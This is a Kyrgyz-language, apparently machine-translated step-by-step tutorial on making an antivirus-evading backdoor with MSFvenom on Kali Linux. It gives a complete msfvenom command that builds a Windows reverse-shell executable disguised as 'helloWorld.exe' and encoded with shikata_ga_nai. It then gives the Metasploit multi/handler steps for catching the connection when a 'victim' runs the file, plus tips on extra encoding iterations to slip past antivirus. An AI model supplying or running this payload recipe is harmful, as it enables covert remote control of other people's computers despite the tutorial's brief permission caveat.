Kali Linuxто MSFvenomду колдонуу менен табылбай турган арткы эшикти кантип түзүү керек

2024 Автор: Gilbert Ryder | [email protected]. Акыркы өзгөртүү: 2023-12-16 17:36

Арткы эшик коопсуздук механизмдерин айланып өтүү үчүн колдонулат, көбүнчө жашыруун жана негизинен байкалбайт. MSFvenom, msfpayload жана msfencode айкалышын колдонуу менен, тескери кабык TCPди колдонуу менен чабуулчуга кайра туташкан арткы эшикти түзсө болот. Арткы эшикти иштеп чыгуу үчүн, антивирустук программадан качуу үчүн зыяндуу программаңыздын колтамгасын өзгөртүү керек. Бул долбоорду кирүүгө уруксатыңыз бар бир жуп компьютерде аяктаңыз, жана процессте сиз компьютердин коопсуздугу жана бул эшиктин кандай иштээри жөнүндө көбүрөөк билесиз.

Кадамдар

MSFvenomду колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз Kali Linux 1 -кадам

Кадам 1. Калини иштетип, Терминалдын консолун күйгүзүңүз

MSFvenomду колдонуп, дээрлик аныкталбай турган эшикти түзүңүз Kali Linux 2 -кадам

Кадам 2. Interfaceти көрсөтүү үчүн ifconfig териңиз жана IP дарегиңизди текшериңиз

Kali Linux MSFvenom колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз 3 -кадам

Кадам 3. Тип msfvenom -l encoders кодерлердин тизмесин көрсөтүү үчүн

Сиз коддогуч катары x86/shikata_ga_nai колдоносуз

MSFvenomду колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз Kali Linux 4 -кадам

4 -кадам. "Msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe териңиз

-a x86 -платформанын терезелери архитектураны белгилейт.
-p windows/shell/reverse_tcp жүктөө үчүн жүктөрдү белгилейт.
LHOST угуучунун IP дарегин аныктайт.
LPORT угуучу портун белгилейт.
-b "\ x00" жаман мүнөздөн (null байт) оолак болууну белгилейт.
-e x86/shikata_ga_nai коддогучтардын атын белгилейт.
-f exe> helloWorld.exe форматтын чыгышын белгилейт.

Kali Linux MSFvenom колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз 5 -кадам

Кадам 5. Metasploitти жандандыруу үчүн msfconsole териңиз

Эми сиз арткы эшигиңизди түздүңүз. Жабырлануучу helloWorld.exeге чыкылдатканда, камтылган кабык жүктөлүшү активдештирилип, кайра тутумуңузга туташат. Байланышты алуу үчүн, Metasploitте мульти-иштеткичти ачып, жүктөмдөрдү орнотушуңуз керек

MSFvenom менен Kali Linux 6 -кадамды колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз 6 -кадам

Step 6. Type Use exploit/multi/handler

Kali Linux MSFvenom колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз 7 -кадам

Кадам 7. Түр жүктөө терезелери/shell/reverse_tcp

MSFvenom менен Kali Linux 8 -кадамын колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз 8 -кадам

Кадам 8. Модулду текшерүү үчүн шоу варианттарын териңиз

MSFvenomду колдонуп, дээрлик аныкталбай турган эшикти түзүңүз Кали Linux 9 -кадам

Step 9. Type LHOST 192.168.48.129

"LHOST" угуучунун IP дарегин белгилейт

MSFvenomду колдонуп, дээрлик аныкталбай турган эшикти түзүңүз Kali Linux 10 -кадам

Step 10. Type LPORT 4444 териңиз

"LPORT" угуучу портун аныктайт

MSFvenomду колдонуп, дээрлик аныкталбай турган эшикти түзүңүз Kali Linux 11 -кадам

Кадам 11. Run деп териңиз жана жабырлануучунун машинасынан туташууну күтүңүз

Kali Linux MSFvenom колдонуп, дээрлик аныкталбаган арткы эшикти түзүңүз 12 -кадам

Кадам 12. Жабырлануучунун helloWorld.exeге чыкмасын күтө туруңуз

Андан кийин сиз жабырлануучунун машинасына ийгиликтүү туташасыз.

Кеңештер

-I MSFvenomдо колдонуу коддоонун кайталанышын билдирет. Кээде дагы кайталоолор AV программасынан качууга жардам берет.
Сиз арткы эшикти кантип түзүүнү жана MSFvenomду колдонуу менен коддолууну үйрөндүңүз, бирок бул ыкма азыркы учурда кээ бир AV программалык камсыздоосуна каршы иштебейт. Мунун себеби MSFvenomдогу аткаруу шаблондоруна байланыштуу. AV сатуучулар бул шаблондордун статикалык колтамгасын кошушту жана аларды издешет. Бул маселени чечүү үчүн башка аткаруу шаблонун же башка куралдарды колдонуу керек.